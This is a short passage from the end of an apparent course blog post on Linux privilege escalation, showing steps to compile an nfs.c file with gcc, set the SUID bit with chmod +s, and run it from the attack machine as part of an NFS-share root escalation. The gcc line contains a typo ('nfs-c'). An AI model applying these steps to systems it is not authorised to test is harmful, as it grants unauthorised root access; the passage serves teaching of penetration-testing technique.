V1ndl3R/CIT480/_posts/2021-12-22-LinuxPrivEsc.markdown

 	}

 Once you save the nfs.c complile it with gcc.

 	gcc nfs-c -o nfs -w
 	chmod +s nfs

 Switch back to the attack machine and you should see both files run the compliled file.

 	./nfs

+There are more and new escalation techniques all the time but this will get you started.